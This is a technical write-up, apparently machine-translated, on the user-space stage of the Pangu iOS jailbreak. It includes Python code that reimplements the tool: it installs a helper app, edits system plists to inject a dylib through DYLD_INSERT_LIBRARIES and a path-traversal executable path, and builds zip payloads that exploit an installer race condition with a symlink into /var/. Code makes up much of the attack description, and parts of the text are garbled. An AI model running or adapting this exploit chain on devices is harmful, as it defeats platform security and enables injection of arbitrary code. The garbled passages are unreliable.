Actions of pangu jailbreak tool in user space

Background

Pangu mainly exploits the IOS installer vulnerability in the user space. Here we will first list the main processes for installing an application:

The entire installation process is divided into 12 phases, which only lists the start point, end point, and more important stages for pangu jailbreak. Note the time range shown in the red line. If you create a symbolic link in "staging directory" beyond the sandbox, you can use the decompression program to write files to the system directory. You can also control the file list in the compressed package and place a large file at the start to create a symbolic link during the decompression process. This is a major vulnerability used during the installation of pangu. The following describes the behavior of pangu in user space.

Main Components

Pangu consists of four parts ,:
1. desktop program: provides resources to control the jailbreak process.
2. com. pangu. ipa1.ipa: socket server, which works with the desktop program to create competitive conditions.
3. pangu. dylib, socket server, and Kernel Vulnerability installation of untecher and cydia.
4、pangu.tar, untecher
It mainly involves the first two components and the user space related parts of the third component.

Workflow

Note: In order to verify that your analysis is correct, you can use python to re-implement the pangu desktop program function and use the pangu payload to implement jailbreak. The following shows the corresponding sample code in the main phase.

Phase 1: Install the Helper Program to obtain related resources 1. Install com. pangu. ipa1.ipa

def install_pangu():    lockdown = LockdownClient()    afc = AFCClient(lockdown)    mci = lockdown.startService("com.apple.mobile.installation_proxy")     file_name = "com.pangu.ipa1.ipa"    afc.set_file_contents("/PublicStaging/" + file_name, open("payload/" + file_name,"rb").read())    mci.sendPlist({"Command":"Install", "PackagePath": "/PublicStaging/" + file_name})    while True:        status =  mci.recvPlist()        if not status:            break        completion = status.get("PercentComplete")        if completion:            print "Installing, %s: %s %% Complete" % ("com.pangu.ipa1.ipa", status["PercentComplete"])        if status.get("Status") == "Complete":            print "Installation %s\n" % status["Status"]            break    mci.close()    afc.stop_session()    lockdown.stop_session()

First, use the AFC service to upload IPA to the device, and then use installation proxy to install the application.

2. Get Cache

def download_caches():    fc = FileRelayClient()    data = fc.request_sources(["Caches"])    fc.stop_session()    if data:        file_path = "./payload/caches.gz"        output_path = "./payload/caches"        open(file_path,"wb").write(data)        print  "Data saved to:  %s " % file_path        with open(file_path, "r") as f:            gz = gzip.GzipFile(mode="rb", fileobj=f)            cpio = CpioArchive(fileobj=BytesIO(gz.read()))            cpio.extract_files(files=None,outpath=output_path)    else:        print "Fail to get caches"        raise Exception("Fail to get caches")

Call the filerelay service to obtain the cache, which is mainly used to obtain com. Apple. Mobile. Installation. plist.

3. Modify com. Apple. Mobile. Installation. plist.

The modification is for the pangu program. The specific modification is as follows:

CFBundleExecutable = "../../../../../../usr/libexec/lockdownd";EnvironmentVariables = { DYLD_INSERT_LIBRARIES = "/private/var/mobile/Media/Pangu-Install/pangu.dylib"; };

4. Modify info. plist of pangu Program

CFBundleExecutable = "../../../../../../usr/libexec/lockdownd";

5. Construct applicationstate. plist

{ "com.pangu.ipa1" = { SBApplicationAutoLaunchForVoIP = :true; }; }

This will cause the pangu program to run automatically after the device restarts.

62.16com.apple.launchservices-056.css tore is mainly used to update the program list. 7. com. Apple. backboardd. plist"

Based on the above file pangu, three payloads are constructed.

def generate_upgrade_bundle1():    guid_str = get_guid()    with ZipFile("./payload/upgrade1.zip", "w") as payload:        payload.write("./payload/upgrade_bundle/bigfile", "/tmp/bigfile")        payload.write("./payload/upgrade_bundle/com.apple.LaunchServices-056.csstore", "/mobile/Library/Caches/com.apple.LaunchServices-056.csstore")        payload.write("./payload/upgrade_bundle/com.apple.mobile.installation.plist", "/mobile/Library/Caches/com.apple.mobile.installation.plist")        payload.write("./payload/upgrade_bundle/applicationState.plist", "/mobile/Library/BackBoard/applicationState.plist")        payload.write("./payload/upgrade_bundle/com.apple.backboardd.plist", "/mobile/Library/Preferences/com.apple.backboardd.plist")        payload.write("./payload/upgrade_bundle/Info.plist", "/mobile/Applications/" + guid_str + "/ipa1.app/Info.plist") def generate_upgrade_bundle2():    # os.remove("./payload/upgrade2.zip")    guid_str = get_guid()    with ZipFile("./payload/upgrade2.zip", "w") as payload:        payload.write("./payload/upgrade_bundle/bigfile", "/tmp/bigfile")        payload.write("./payload/upgrade_bundle/com.apple.mobile.installation.plist", "/mobile/Library/Caches/com.apple.mobile.installation.plist")def generate_upgrade_bundle3():    # os.remove("./payload/upgrade3.zip")    guid_str = get_guid()    with ZipFile("./payload/upgrade3.zip", "w") as payload:        payload.write("./payload/upgrade_bundle/bigfile", "/tmp/bigfile")payload.write("./payload/upgrade_bundle/com.apple.LaunchServices-056.csstore", "/mobile/Library/Caches/com.apple.LaunchServices-056.csstore")

At this stage, we will know three program upgrade packages for use in the next stage.
In addition, it can be simply understood that pangu prompts the user to start the program on the mobile phone after this stage is completed.

Stage 2: Construct the environment to execute pangu. dylib by using the installation file of the Race Condition

After a user starts a program on the mobile phone, the app on the mobile phone starts a socket server and waits for the handshake of the desktop program. This handshake is quite interesting. The desktop sends ping to the app. The app returns pong to the desktop after receiving the ping request. After the handshake is complete, pangu uses static conditions to install the three payloads constructed above on the mobile phone.
The specific process is to first use the installation service to install the upgrade package. During the installation process, the desktop sends the starthook to the app. The specific hook content can be determined by the app debugging to create a symbolic link:

"/private/var/tmp/install_staging.eP7ZzJ/foo_extracted" ---> "/var/"

The suffix varies with each installation.

Sample Code:

def fire_race_condition(lockdown, file_name):    mci = lockdown.startService("com.apple.mobile.installation_proxy")    sock = get_sock()    print "----->PING"    sock.send("PING")    msg = sock.recv(4)    if msg == "PONG":        print "<-----PONG\n"    upgrade_pangu(mci, file_name)    print "----->starthook"    sock.send("starthook")    msg = sock.recv(4)    if msg == "succ":        print "<-----success\n"    else:        print "<-----fail\n"

After installing three payloads, pangu will upload the file to the pangu-install directory in media: cydia.tarw.packagelist.tarw.pangu.dylibw.pangu.tarw.pangu_ex.tar.

So far, pangu has basically completed the user space behavior, and the response on the interface is: pangu will restart the device.

Stage 3: Use the vulnerability to install untecher and cydia

After the device is restarted, pangu. dylib is loaded and a socket server is started. After detecting that the device is loaded, the desktop program sends the following messages to pangu. dylib: 55aa. pangu. dylib starts to install untecher and cydia after receiving 55aa.

Phase 4: Cleaning

After pangu. dylib completes the work, it sends the following code to the desktop program: aa55. The desktop program begins to clear temporary files, delete Provisional files, and restore the device time. After cleaning, the desktop program restarts the device for the second time.

Actions of pangu jailbreak tool in user space